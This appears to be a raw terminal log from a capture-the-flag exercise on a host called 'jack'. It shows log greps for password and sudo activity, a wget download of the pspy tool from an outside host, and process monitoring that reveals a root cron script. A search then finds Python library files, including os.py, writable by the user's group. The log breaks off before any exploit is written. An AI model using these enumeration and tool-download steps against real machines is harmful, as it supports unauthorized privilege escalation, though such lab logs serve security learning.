2019-02-26 23:59:08 status half-installed passwd:amd64 1:4.2-3.1ubuntu5
2019-02-26 23:59:08 status unpacked passwd:amd64 1:4.2-3.1ubuntu5
2019-02-26 23:59:08 status unpacked passwd:amd64 1:4.2-3.1ubuntu5.3
2019-02-26 23:59:08 upgrade passwd:amd64 1:4.2-3.1ubuntu5 1:4.2-3.1ubuntu5.3
2019-02-26 23:59:09 configure passwd:amd64 1:4.2-3.1ubuntu5.3 <none>
2019-02-26 23:59:09 status half-configured passwd:amd64 1:4.2-3.1ubuntu5.3
2019-02-26 23:59:09 status installed passwd:amd64 1:4.2-3.1ubuntu5.3
2019-02-26 23:59:09 status unpacked passwd:amd64 1:4.2-3.1ubuntu5.3
 base-passwd depends on libc6 (>= 2.8); however:
 base-passwd depends on libdebconfclient0 (>= 0.145); however:
Binary file /var/log/auth.log matches
Binary file /var/log/syslog matches
Description: Set up users and passwords
dpkg: base-passwd: dependency problems, but configuring anyway as you requested:
Jan 10 08:05:13 jack passwd[4712]: pam_unix(passwd:chauthtok): password changed for jack
Jan 10 08:07:47 jack passwd[4720]: pam_unix(passwd:chauthtok): password changed for root
Jan 10 08:13:51 jack gpasswd[4787]: user jack removed by root from group lxd
Jan 10 09:00:20 jack gpasswd[4851]: user jack removed by root from group sudo
Jan 10 09:28:43 jack sudo:     root : TTY=pts/0 ; PWD=/root ; USER=root ; COMMAND=list
Jan 10 09:29:00 jack sudo:     jack : command not allowed ; TTY=pts/0 ; PWD=/home/jack ; USER=root ; COMMAND=list
Jan 10 14:57:46 jack systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jan  8 11:23:39 jack systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jan  9 09:57:08 jack sshd[1513]: Accepted password for jack from 192.168.1.137 port 52860 ssh2
Jan  9 09:57:22 jack sudo:     jack : 3 incorrect password attempts ; TTY=pts/0 ; PWD=/home/jack ; USER=root ; COMMAND=/bin/bash
Jan  9 09:57:40 jack sudo:     jack : TTY=pts/0 ; PWD=/home/jack ; USER=root ; COMMAND=/bin/bash
Jan  9 10:10:47 jack sudo:     root : TTY=pts/0 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/apt-get install apache2 libapache2-mod-php7.0 -y
Jan  9 10:11:35 jack chage[9952]: changed password expiry for mysql
Jan  9 10:16:53 jack sudo:     root : TTY=pts/0 ; PWD=/var/www ; USER=root ; COMMAND=/usr/sbin/a2enmod rewrite
Jan  9 10:22:24 jack sudo:     root : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/bin/chown -R www-data:www-data /var/www/html/octobercms/
Jan  9 10:22:28 jack sudo:     root : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/bin/chmod -R 755 /var/www/html/
Jan  9 10:22:32 jack sudo:     root : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/bin/nano /etc/apache2/sites-available/octobercms.conf
Jan  9 10:22:47 jack sudo:     root : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/sbin/a2ensite octobercms
Jan  9 10:22:52 jack sudo:     root : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/bin/systemctl restart apache2
Jan  9 10:23:20 jack sudo:     root : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/bin/nano /etc/apache2/sites-available/octobercms.conf
Jan  9 10:23:47 jack sudo:     root : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/bin/systemctl restart apache2
Jan  9 10:25:41 jack sudo:     root : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/bin/nano /etc/apache2/sites-available/octobercms.conf
Jan  9 10:26:04 jack sudo:     root : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/bin/nano /etc/apache2/sites-available/octobercms.conf
Jan  9 10:28:57 jack sudo:     root : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/bin/nano /etc/apache2/sites-available/octobercms.conf
Jan  9 10:29:41 jack sudo:     root : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/bin/nano /etc/apache2/sites-available/octobercms.conf
Jan  9 10:29:56 jack sudo:     root : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/bin/nano /etc/apache2/sites-available/octobercms.conf
Jan  9 13:22:40 jack systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jan  9 13:23:50 jack sshd[1630]: Accepted password for jack from 192.168.1.137 port 53030 ssh2
Jan  9 13:23:54 jack sudo:     jack : TTY=pts/0 ; PWD=/home/jack ; USER=root ; COMMAND=/bin/bash
Preparing to unpack .../base-passwd_3.5.39_amd64.deb ...
Preparing to unpack .../passwd_1%3a4.2-3.1ubuntu5_amd64.deb ...
Selecting previously unselected package base-passwd.
Selecting previously unselected package passwd.
Setting up base-passwd (3.5.39) ...


ack@jack:/tmp$ wget http://10.8.19.103:8000/pspy64s
--2023-01-18 15:24:18--  http://10.8.19.103:8000/pspy64s
Connecting to 10.8.19.103:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1156536 (1.1M) [application/octet-stream]
Saving to: ‘pspy64s’

pspy64s                        100%[====================================================>]   1.10M   609KB/s    in 1.9s    

2023-01-18 15:24:20 (609 KB/s) - ‘pspy64s’ saved [1156536/1156536]

jack@jack:/tmp$ chmod +x pspy64s; ./pspy64s
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2023/01/18 15:24:39 CMD: UID=0    PID=959    | /sbin/iscsid 
2023/01/18 15:24:39 CMD: UID=0    PID=958    | /sbin/iscsid 
2023/01/18 15:24:39 CMD: UID=0    PID=954    | /usr/lib/policykit-1/polkitd --no-debug 
2023/01/18 15:24:39 CMD: UID=0    PID=928    | /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog 
2023/01/18 15:24:39 CMD: UID=0    PID=918    | /usr/sbin/acpid 
2023/01/18 15:24:39 CMD: UID=0    PID=913    | /usr/lib/accountsservice/accounts-daemon 
2023/01/18 15:24:39 CMD: UID=111  PID=901    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation 
2023/01/18 15:24:39 CMD: UID=0    PID=9      | 
2023/01/18 15:24:39 CMD: UID=0    PID=892    | /usr/lib/snapd/snapd 
2023/01/18 15:24:39 CMD: UID=108  PID=890    | /usr/sbin/rsyslogd -n 
2023/01/18 15:24:39 CMD: UID=0    PID=882    | /usr/bin/lxcfs /var/lib/lxcfs/ 
2023/01/18 15:24:39 CMD: UID=0    PID=879    | /lib/systemd/systemd-logind 
2023/01/18 15:24:39 CMD: UID=0    PID=876    | /usr/sbin/atd -f 
2023/01/18 15:24:39 CMD: UID=0    PID=865    | /usr/sbin/cron -f 
2023/01/18 15:24:39 CMD: UID=0    PID=84     | 
2023/01/18 15:24:39 CMD: UID=0    PID=83     | 
2023/01/18 15:24:39 CMD: UID=0    PID=82     | 
2023/01/18 15:24:39 CMD: UID=0    PID=8      | 
2023/01/18 15:24:39 CMD: UID=0    PID=721    | /sbin/dhclient -1 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0 
2023/01/18 15:24:39 CMD: UID=0    PID=7      | 
2023/01/18 15:24:39 CMD: UID=1000 PID=6905   | -bash 
2023/01/18 15:24:39 CMD: UID=1000 PID=6904   | sshd: jack@pts/1     
2023/01/18 15:24:39 CMD: UID=0    PID=69     | 
2023/01/18 15:24:39 CMD: UID=0    PID=6871   | sshd: jack [priv]    
2023/01/18 15:24:39 CMD: UID=0    PID=6795   | 
2023/01/18 15:24:39 CMD: UID=0    PID=64     | 
2023/01/18 15:24:39 CMD: UID=1000 PID=6202   | ./pspy64s 
2023/01/18 15:24:39 CMD: UID=0    PID=62     | 
2023/01/18 15:24:39 CMD: UID=0    PID=61     | 
2023/01/18 15:24:39 CMD: UID=0    PID=60     | 
2023/01/18 15:24:39 CMD: UID=0    PID=6      | 
2023/01/18 15:24:39 CMD: UID=0    PID=59     | 
2023/01/18 15:24:39 CMD: UID=0    PID=58     | 
2023/01/18 15:24:39 CMD: UID=0    PID=57     | 
2023/01/18 15:24:39 CMD: UID=0    PID=56     | 
2023/01/18 15:24:39 CMD: UID=0    PID=55     | 
2023/01/18 15:24:39 CMD: UID=0    PID=54     | 
2023/01/18 15:24:39 CMD: UID=0    PID=53     | 
2023/01/18 15:24:39 CMD: UID=0    PID=52     | 
2023/01/18 15:24:39 CMD: UID=0    PID=51     | 
2023/01/18 15:24:39 CMD: UID=0    PID=50     | 
2023/01/18 15:24:39 CMD: UID=0    PID=5      | 
2023/01/18 15:24:39 CMD: UID=0    PID=49     | 
2023/01/18 15:24:39 CMD: UID=102  PID=476    | /lib/systemd/systemd-timesyncd 
2023/01/18 15:24:39 CMD: UID=0    PID=438    | /lib/systemd/systemd-udevd 
2023/01/18 15:24:39 CMD: UID=0    PID=4      | 
2023/01/18 15:24:39 CMD: UID=0    PID=397    | /sbin/lvmetad -f 
2023/01/18 15:24:39 CMD: UID=0    PID=394    | 
2023/01/18 15:24:39 CMD: UID=0    PID=393    | 
2023/01/18 15:24:39 CMD: UID=0    PID=392    | 
2023/01/18 15:24:39 CMD: UID=0    PID=391    | 
2023/01/18 15:24:39 CMD: UID=0    PID=390    | 
2023/01/18 15:24:39 CMD: UID=0    PID=386    | 
2023/01/18 15:24:39 CMD: UID=0    PID=373    | 
2023/01/18 15:24:39 CMD: UID=0    PID=372    | 
2023/01/18 15:24:39 CMD: UID=0    PID=355    | /lib/systemd/systemd-journald 
2023/01/18 15:24:39 CMD: UID=0    PID=33     | 
2023/01/18 15:24:39 CMD: UID=0    PID=32     | 
2023/01/18 15:24:39 CMD: UID=0    PID=31     | 
2023/01/18 15:24:39 CMD: UID=0    PID=30     | 
2023/01/18 15:24:39 CMD: UID=0    PID=3      | 
2023/01/18 15:24:39 CMD: UID=0    PID=288    | 
2023/01/18 15:24:39 CMD: UID=0    PID=287    | 
2023/01/18 15:24:39 CMD: UID=0    PID=27     | 
2023/01/18 15:24:39 CMD: UID=0    PID=263    | 
2023/01/18 15:24:39 CMD: UID=0    PID=26     | 
2023/01/18 15:24:39 CMD: UID=0    PID=25     | 
2023/01/18 15:24:39 CMD: UID=0    PID=247    | 
2023/01/18 15:24:39 CMD: UID=0    PID=24     | 
2023/01/18 15:24:39 CMD: UID=0    PID=232    | 
2023/01/18 15:24:39 CMD: UID=0    PID=23     | 
2023/01/18 15:24:39 CMD: UID=0    PID=22     | 
2023/01/18 15:24:39 CMD: UID=0    PID=21     | 
2023/01/18 15:24:39 CMD: UID=0    PID=20242  | 
2023/01/18 15:24:39 CMD: UID=0    PID=20     | 
2023/01/18 15:24:39 CMD: UID=0    PID=2      | 
2023/01/18 15:24:39 CMD: UID=0    PID=19     | 
2023/01/18 15:24:39 CMD: UID=0    PID=18     | 
2023/01/18 15:24:39 CMD: UID=0    PID=17     | 
2023/01/18 15:24:39 CMD: UID=0    PID=160    | 
2023/01/18 15:24:39 CMD: UID=1000 PID=1527   | -bash 
2023/01/18 15:24:39 CMD: UID=1000 PID=1526   | sshd: jack@pts/0     
2023/01/18 15:24:39 CMD: UID=0    PID=15     | 
2023/01/18 15:24:39 CMD: UID=1000 PID=1466   | (sd-pam)   
2023/01/18 15:24:39 CMD: UID=1000 PID=1464   | /lib/systemd/systemd --user 
2023/01/18 15:24:39 CMD: UID=0    PID=1462   | sshd: jack [priv]    
2023/01/18 15:24:39 CMD: UID=33   PID=1458   | /usr/sbin/apache2 -k start 
2023/01/18 15:24:39 CMD: UID=0    PID=14     | 
2023/01/18 15:24:39 CMD: UID=33   PID=1357   | /usr/sbin/apache2 -k start 
2023/01/18 15:24:39 CMD: UID=33   PID=1356   | /usr/sbin/apache2 -k start 
2023/01/18 15:24:39 CMD: UID=33   PID=1355   | /usr/sbin/apache2 -k start 
2023/01/18 15:24:39 CMD: UID=33   PID=1354   | /usr/sbin/apache2 -k start 
2023/01/18 15:24:39 CMD: UID=33   PID=1353   | /usr/sbin/apache2 -k start 
2023/01/18 15:24:39 CMD: UID=0    PID=130    | 
2023/01/18 15:24:39 CMD: UID=0    PID=13     | 
2023/01/18 15:24:39 CMD: UID=0    PID=129    | 
2023/01/18 15:24:39 CMD: UID=0    PID=1284   | logger -t mysqld -p daemon error 
2023/01/18 15:24:39 CMD: UID=118  PID=1283   | /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --skip-log-error --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306 
2023/01/18 15:24:39 CMD: UID=0    PID=128    | 
2023/01/18 15:24:39 CMD: UID=0    PID=127    | 
2023/01/18 15:24:39 CMD: UID=0    PID=126    | 
2023/01/18 15:24:39 CMD: UID=0    PID=125    | 
2023/01/18 15:24:39 CMD: UID=0    PID=124    | 
2023/01/18 15:24:39 CMD: UID=0    PID=123    | 
2023/01/18 15:24:39 CMD: UID=0    PID=122    | 
2023/01/18 15:24:39 CMD: UID=0    PID=12     | 
2023/01/18 15:24:39 CMD: UID=0    PID=1197   | /usr/sbin/apache2 -k start 
2023/01/18 15:24:39 CMD: UID=0    PID=1122   | /bin/bash /usr/bin/mysqld_safe 
2023/01/18 15:24:39 CMD: UID=0    PID=11     | 
2023/01/18 15:24:39 CMD: UID=0    PID=1060   | /sbin/agetty --noclear tty1 linux 
2023/01/18 15:24:39 CMD: UID=0    PID=1057   | /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220 
2023/01/18 15:24:39 CMD: UID=0    PID=1005   | /usr/sbin/sshd -D 
2023/01/18 15:24:39 CMD: UID=0    PID=10     | 
2023/01/18 15:24:39 CMD: UID=0    PID=1      | /sbin/init 
2023/01/18 15:26:01 CMD: UID=0    PID=6214   | /usr/sbin/CRON -f 
2023/01/18 15:26:01 CMD: UID=0    PID=6216   | /usr/bin/python /opt/statuscheck/checker.py 
2023/01/18 15:26:01 CMD: UID=0    PID=6215   | /bin/sh -c /usr/bin/python /opt/statuscheck/checker.py 
2023/01/18 15:26:02 CMD: UID=0    PID=6218   | /usr/bin/curl -s -I http://127.0.0.1 
2023/01/18 15:26:02 CMD: UID=0    PID=6217   | sh -c /usr/bin/curl -s -I http://127.0.0.1 >> /opt/statuscheck/output.log 

jack@jack:/tmp$ cd /opt/statuscheck/
jack@jack:/opt/statuscheck$ ls
checker.py  output.log
jack@jack:/opt/statuscheck$ cat checker.py 
import os

os.system("/usr/bin/curl -s -I http://127.0.0.1 >> /opt/statuscheck/output.log")
jack@jack:/opt/statuscheck$ cat output.log 
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 00:44:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 00:46:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 00:48:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 00:50:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 00:52:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 00:54:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 00:56:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 00:58:02 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 01:00:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 01:02:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 01:04:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 01:06:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 01:08:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 01:10:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 01:12:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 01:14:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 01:16:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 01:18:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 01:20:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 01:22:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Mon, 13 Jan 2020 19:12:02 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Mon, 16 Nov 2020 20:28:02 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Mon, 16 Nov 2020 20:30:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Mon, 16 Nov 2020 20:32:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Mon, 16 Nov 2020 20:34:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Mon, 16 Nov 2020 20:36:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Mon, 16 Nov 2020 20:38:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Mon, 16 Nov 2020 20:40:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Mon, 16 Nov 2020 20:42:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Mon, 16 Nov 2020 20:44:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Wed, 18 Jan 2023 20:50:04 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Wed, 18 Jan 2023 20:52:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Wed, 18 Jan 2023 20:54:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Wed, 18 Jan 2023 20:56:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Wed, 18 Jan 2023 20:58:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Wed, 18 Jan 2023 21:00:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Wed, 18 Jan 2023 21:02:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Wed, 18 Jan 2023 21:04:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Wed, 18 Jan 2023 21:06:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Wed, 18 Jan 2023 21:08:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Wed, 18 Jan 2023 21:10:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Wed, 18 Jan 2023 21:12:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Wed, 18 Jan 2023 21:14:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Wed, 18 Jan 2023 21:16:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Wed, 18 Jan 2023 21:18:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Wed, 18 Jan 2023 21:20:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Wed, 18 Jan 2023 21:22:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Wed, 18 Jan 2023 21:24:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Wed, 18 Jan 2023 21:26:02 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

jack@jack:/tmp$ id
uid=1000(jack) gid=1000(jack) groups=1000(jack),4(adm),24(cdrom),30(dip),46(plugdev),115(lpadmin),116(sambashare),1001(family)


jack@jack:/opt/statuscheck$ find / -group family 2>/dev/null
/usr/lib/python2.7/_threading_local.py
/usr/lib/python2.7/plistlib.pyc
/usr/lib/python2.7/stringprep.py
/usr/lib/python2.7/ihooks.pyc
/usr/lib/python2.7/weakref.py
/usr/lib/python2.7/sgmllib.pyc
/usr/lib/python2.7/os.py
/usr/lib/python2.7/posixpath.py
/usr/lib/python2.7/copy_reg.py
/usr/lib/python2.7/bdb.py
/usr/lib/python2.7/smtpd.pyc
/usr/lib/python2.7/dircache.pyc
/usr/lib/python2.7/bisect.pyc
/usr/lib/python2.7/fnmatch.py
/usr/lib/python2.7/heapq.py
/usr/lib/python2.7/struct.pyc
/usr/lib/python2.7/fpformat.py
/usr/lib/python2.7/hotshot
/usr/lib/python2.7/shutil.py
/usr/lib/python2.7/posixpath.pyc
/usr/lib/python2.7/cmd.py
/usr/lib/python2.7/hmac.py
/usr/lib/python2.7/_sysconfigdata.pyc
/usr/lib/python2.7/plistlib.py
/usr/lib/python2.7/contextlib.py
/usr/lib/python2.7/posixfile.pyc
/usr/lib/python2.7/Bastion.pyc
/usr/lib/python2.7/macpath.pyc
/usr/lib/python2.7/telnetlib.py
/usr/lib/python2.7/anydbm.pyc
/usr/lib/python2.7/posixfile.py
/usr/lib/python2.7/htmlentitydefs.pyc
/usr/lib/python2.7/collections.pyc
/usr/lib/python2.7/modulefinder.py
/usr/lib/python2.7/inspect.pyc
/usr/lib/python2.7/SimpleXMLRPCServer.pyc
/usr/lib/python2.7/dircache.py
/usr/lib/python2.7/_pyio.py
/usr/lib/python2.7/Cookie.py
/usr/lib/python2.7/pipes.py
/usr/lib/python2.7/rlcompleter.pyc
/usr/lib/python2.7/SocketServer.py
/usr/lib/python2.7/tempfile.py
/usr/lib/python2.7/smtpd.py
/usr/lib/python2.7/uuid.py
/usr/lib/python2.7/repr.pyc
/usr/lib/python2.7/webbrowser.pyc
/usr/lib/python2.7/multifile.pyc
/usr/lib/python2.7/rfc822.pyc
/usr/lib/python2.7/xdrlib.py
/usr/lib/python2.7/ssl.pyc
/usr/lib/python2.7/symtable.py
/usr/lib/python2.7/test
/usr/lib/python2.7/csv.py
/usr/lib/python2.7/sunaudio.py
/usr/lib/python2.7/distutils
/usr/lib/python2.7/base64.py
/usr/lib/python2.7/wave.pyc
/usr/lib/python2.7/UserString.py
/usr/lib/python2.7/pdb.py
/usr/lib/python2.7/mimify.pyc
